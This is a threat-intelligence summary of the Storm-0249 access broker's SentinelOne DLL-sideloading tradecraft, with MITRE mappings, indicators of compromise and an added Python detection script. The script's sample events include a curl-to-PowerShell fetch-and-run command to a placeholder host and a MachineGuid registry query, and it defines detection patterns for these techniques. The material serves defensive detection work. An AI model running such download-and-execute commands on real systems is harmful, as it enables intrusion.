Storm-0249 has evolved from mass phishing to targeted post-exploitation operations that weaponize trusted EDR processes—notably abusing SentinelOne’s SentinelAgentWorker.exe via DLL sideloading, fileless PowerShell execution, and Microsoft domain spoofing to hide C2 and reconnaissance. Organizations need behavior-based detection, DNS monitoring for newly registered domains, and automated response playbooks to detect and isolate anomalies like DLL sideloading and curl-to-PowerShell piping before ransomware affiliates exploit pre-staged access. #Storm-0249 #SentinelOne
Keypoints
- Storm-0249 shifted from mass phishing to precision access brokerage, selling pre-staged access to ransomware affiliates and reducing time-to-ransom.
- The group abuses legitimate tools and signed EDR processes—using curl-to-PowerShell piping, Microsoft domain spoofing, and DLL sideloading against SentinelAgentWorker.exe—to hide malicious activity as routine telemetry.
- An MSI delivered via phishing (sgcipl[.]com/us.microsoft.com/…) installs a trojanized DLL (SentinelAgentCore.dll) alongside the legitimate SentinelOne binary, enabling DLL sideloading and SYSTEM-level persistence.
- After hijacking the EDR process, attackers establish encrypted C2 over TLS to disposable domains and perform reconnaissance (reg.exe, findstr.exe) to collect MachineGuid and other system identifiers for ransomware binding.
- These techniques neutralize signature-based and reputation-based defenses (newly registered domains, signed binaries) and are adaptable to other EDR vendors, creating cross-industry risk.
- ReliaQuest recommends behavioral analytics, DNS monitoring for recent domains, limiting/controlling curl.exe and PowerShell workflows, and automated isolation/blocking playbooks to reduce mean time to contain.
- Standard remediation (reinstalling agents/patching) may fail because MSI-installed, SYSTEM-privileged footholds and sideloaded DLLs can persist across routine fixes.
MITRE Techniques
- [T1566.001 ] Phishing: Spearphishing Attachment – Used to deliver a malicious MSI from a phishing URL that tricks users into execution (‘user is tricked into running a malicious MSI package downloaded from a phishing URL (sgcipl[.]com/us.microsoft.com/…)’)
- [T1082 ] System Information Discovery – Attackers ran registry and search utilities under a trusted EDR process to collect system identifiers like MachineGuid (‘the attackers ran commands like reg.exe and findstr.exe to extract system-specific identifiers like MachineGuid’)
- [T1218 ] System Binary Proxy Execution – Legitimate signed binaries and utilities (e.g., curl.exe) were used to fetch and pipe scripts, evading detection (‘Curl-to-PowerShell piping to evade traditional detection methods by weaponizing curl.exe’)
- [T1027 ] Obfuscated Files or Information – Commands and payloads were encoded/obfuscated to hide intent from users and security tools (‘the command appears innocuous but was likely encoded to further obscure its malicious intent from both users and security tools’)
- [T1059.001 ] Command and Scripting Interpreter: PowerShell – Abuse of built-in trusted utilities like curl.exe and PowerShell to execute payloads in memory and avoid disk-based detection (‘leveraging curl.exe, which IT teams use daily for tasks like downloading updates or testing APIs’, ‘the command pipes the content directly into PowerShell’s memory for immediate execution’)
- [T1568.002 ] Dynamic Resolution: Domain Generation Algorithms – Use of rapidly registered/disposable domains and domain rotation to evade static blocklists and reputation-based filtering (‘domain rotation strategy evades static blocklists and reputation-based filtering’)
- [T1203 ] Exploitation for Client Execution – Use of an MSI with SYSTEM privileges to install and execute a trojanized DLL in user context, enabling execution of attacker code (‘The MSI package contains a trojanized DLL impersonating a legitimate SentinelOne EDR component, which is strategically dropped into the user’s AppData folder’)
- [T1574.002 ] Hijack Execution Flow: DLL Side-Loading – Placing a malicious DLL next to a legitimate signed SentinelOne executable so the legitimate binary loads the attacker’s code (‘When the SentinelOne binary brought along by the attacker launches, it loads the malicious DLL instead of the legitimate one sitting next to it—a technique known as DLL sideloading’)
- [T1204.002 ] User Execution: Malicious File – Malicious installers and files delivered via social engineering were used to gain initial elevated execution (‘user is tricked into running a malicious MSI package downloaded from a phishing URL (sgcipl[.]com/us.microsoft.com/…)’)
- [T1486 ] Data Encrypted for Impact – The IAB prepares systems and collects identifiers (MachineGuid) used by ransomware affiliates to bind encryption keys and ensure destructive impact (‘Ransomware groups like “LockBit” and “ALPHV” use MachineGuid to bind encryption keys to individual victim systems’)
- [T1480.002 ] Execution Guardrails: Mutual Exclusion – Persistence mechanisms and pre-staged access reduce opportunities for remediation and allow long-term footholds (inferred mapping; implied by persistence surviving agent reinstalls and updates)
- [T1112 ] Modify Registry – Attackers query and may modify registry keys as part of reconnaissance or persistence (‘the attackers ran commands like reg.exe … to extract system-specific identifiers like MachineGuid’)
- [T1552.002 ] Credentials in Registry – Use of registry data to obtain system-specific credentials or identifiers for later use (detection rules flag credentials stored in the registry)
- [T1547.001 ] Registry Run Keys / Startup Folder – Registry-run keys and startup locations are highlighted as persistence mechanisms to watch (‘Flags the use of the Windows Registry … by adversaries like Storm-0249 for persistence or evasion’)
- [T1012 ] Query Registry – Routine registry queries by the compromised EDR process were abused to gather target profiling information (‘SentinelAgentWorker.exe constantly generates registry queries as part of its normal operations, creating a noisy environment that forces teams to either tune down alerts or drown in noise’)
Indicators of Compromise
- [File Hashes ] trojanized files and payloads (SHA-1) – 07c5599b9bb00feb70c2d5e43b4b76f228866930 (SentinelAgentCore.dll), 423f2fcf7ed347ee57c1a3cffa14099ec16ad09c (Spear.msi)
- [File Names ] artifacts dropped by the MSI and sideloaded DLL – SentinelAgentCore.dll, Spear.msi
- [Domains ] attacker infrastructure and spoofed hosting – sgcipl[.]com (phishing/MSI hosting with /us.microsoft.com/ path), hristomasitomasdf[.]com (C2), krivomadogolyhp[.]com (C2), and other disposable domains
- [IP Addresses ] malicious infrastructure endpoints – 178.16.52[.]145, 172.67.206[.]124
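The behavioral detections recommended in the Keypoints (curl-to-PowerShell piping, the EDR worker running from a user-writable path, DLL sideloading, MachineGuid reconnaissance under the worker) together with the indicators above, turned into runnable logic as an added example; this is not code from the ReliaQuest report or from SentinelOne. The event schema, the install-directory and user-writable-path assumptions, the sample paths and the placeholder hosting URL example.invalid are all constructed here; only the hashes and domains come from the indicator list.

```python
"""Behaviour-based checks for the Storm-0249 tradecraft summarised above.
Added example; the event schema, sample paths and placeholder URL are assumptions."""
import re
from dataclasses import dataclass, field

# Indicators taken from the report (defanging removed; 40-hex digests are SHA-1).
IOC_SHA1 = {
    "07c5599b9bb00feb70c2d5e43b4b76f228866930": "SentinelAgentCore.dll",
    "423f2fcf7ed347ee57c1a3cffa14099ec16ad09c": "Spear.msi",
}
IOC_DOMAINS = {"sgcipl.com", "hristomasitomasdf.com", "krivomadogolyhp.com"}

# Assumed environment facts: user-writable path markers and the agent's install root.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\downloads\\", "\\users\\public\\")
SENTINEL_DIR = "\\program files\\sentinelone\\"
EDR_WORKER = "sentinelagentworker.exe"

CURL_PIPE = re.compile(r"\bcurl(\.exe)?\b[^|]*\|\s*(powershell|pwsh)", re.I)
IEX_FETCH = re.compile(r"\b(iex|invoke-expression)\b.*\b(curl|iwr|invoke-webrequest|invoke-restmethod)\b", re.I)
URL_HOST = re.compile(r"https?://([^/\s\"']+)", re.I)


@dataclass
class ProcessEvent:
    """Process-creation record joined with the modules it loaded (assumed schema)."""
    image: str
    cmdline: str
    parent_image: str
    loaded_modules: dict = field(default_factory=dict)  # module path -> SHA-1


def basename(path: str) -> str:
    return path.lower().replace("/", "\\").rsplit("\\", 1)[-1]


def in_user_writable(path: str) -> bool:
    return any(marker in path.lower() for marker in USER_WRITABLE)


def domain_in_iocs(hostname: str) -> bool:
    """Exact or subdomain match against the reported domains."""
    h = hostname.lower().rstrip(".")
    return any(h == d or h.endswith("." + d) for d in IOC_DOMAINS)


def analyse(ev: ProcessEvent) -> list[str]:
    findings = []
    image, parent, cmd = basename(ev.image), basename(ev.parent_image), ev.cmdline

    # 1. curl output piped straight into PowerShell (or IEX over a fetch): nothing touches disk.
    if CURL_PIPE.search(cmd) or (image in ("powershell.exe", "pwsh.exe") and IEX_FETCH.search(cmd)):
        findings.append("T1059.001 curl-to-PowerShell in-memory execution")

    # 2. The signed EDR worker started from a user-writable directory instead of its install root.
    if image == EDR_WORKER and in_user_writable(ev.image) and SENTINEL_DIR not in ev.image.lower():
        findings.append("T1574.002 SentinelAgentWorker.exe launched from user-writable path")

    # 3. Sideload evidence: a known-bad module hash, or the core DLL resolved from a user-writable path.
    for mod_path, sha1 in ev.loaded_modules.items():
        if sha1.lower() in IOC_SHA1:
            findings.append(f"IOC hash match: {IOC_SHA1[sha1.lower()]}")
        if image == EDR_WORKER and basename(mod_path) == "sentinelagentcore.dll" and in_user_writable(mod_path):
            findings.append("T1574.002 SentinelAgentCore.dll sideloaded from user-writable path")

    # 4. MachineGuid reconnaissance under the worker. The worker's normal registry activity is
    #    noisy, so require the specific value name and raise severity only when the parent
    #    itself runs from a user-writable path.
    if image in ("reg.exe", "findstr.exe") and parent == EDR_WORKER and "machineguid" in cmd.lower():
        severity = "high" if in_user_writable(ev.parent_image) else "review"
        findings.append(f"T1012/T1082 MachineGuid query spawned by EDR worker ({severity})")

    # 5. Any reported domain referenced in a command line.
    for host in URL_HOST.findall(cmd):
        if domain_in_iocs(host):
            findings.append(f"IOC domain contact: {host}")
    return findings


# Constructed sample events (not real telemetry): one benign, three matching the intrusion chain.
SAMPLE_EVENTS = [
    ProcessEvent(  # benign: the real worker from its install directory, started by the agent
        image=r"C:\Program Files\SentinelOne\Sentinel Agent\SentinelAgentWorker.exe",
        cmdline=r'"C:\Program Files\SentinelOne\Sentinel Agent\SentinelAgentWorker.exe"',
        parent_image=r"C:\Program Files\SentinelOne\Sentinel Agent\SentinelAgent.exe"),
    ProcessEvent(  # stage 1: curl piped into PowerShell; hosting URL is a placeholder
        image=r"C:\Windows\System32\cmd.exe",
        cmdline=r"cmd.exe /c curl.exe -s https://example.invalid/stage1 | powershell.exe -nop -w hidden -",
        parent_image=r"C:\Windows\explorer.exe"),
    ProcessEvent(  # stage 2: worker dropped to AppData by the MSI, loads the trojanised core DLL
        image=r"C:\Users\alice\AppData\Roaming\SentinelOne\SentinelAgentWorker.exe",
        cmdline=r'"C:\Users\alice\AppData\Roaming\SentinelOne\SentinelAgentWorker.exe"',
        parent_image=r"C:\Windows\System32\msiexec.exe",
        loaded_modules={r"C:\Users\alice\AppData\Roaming\SentinelOne\SentinelAgentCore.dll":
                        "07c5599b9bb00feb70c2d5e43b4b76f228866930"}),
    ProcessEvent(  # stage 3: MachineGuid reconnaissance under the hijacked worker
        image=r"C:\Windows\System32\reg.exe",
        cmdline=r"reg.exe query HKLM\SOFTWARE\Microsoft\Cryptography /v MachineGuid",
        parent_image=r"C:\Users\alice\AppData\Roaming\SentinelOne\SentinelAgentWorker.exe"),
]


def run(events=SAMPLE_EVENTS) -> dict:
    """Map event index -> list of findings."""
    return {i: analyse(ev) for i, ev in enumerate(events)}


if __name__ == "__main__":
    for i, hits in run().items():
        print(i, hits or "clean")
```

The path and parent checks are what keep rule 4 usable: the worker legitimately queries the registry constantly, so the alert keys on the MachineGuid value name and escalates only when the parent binary lives outside its install root. Rule 2 is the cheapest signal in the chain and fires before any C2 traffic, since a signed vendor binary has no business starting from AppData.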
Read more: https://reliaquest.com/blog/threat-spotlight-storm-0249-precision-endpoint-exploitation/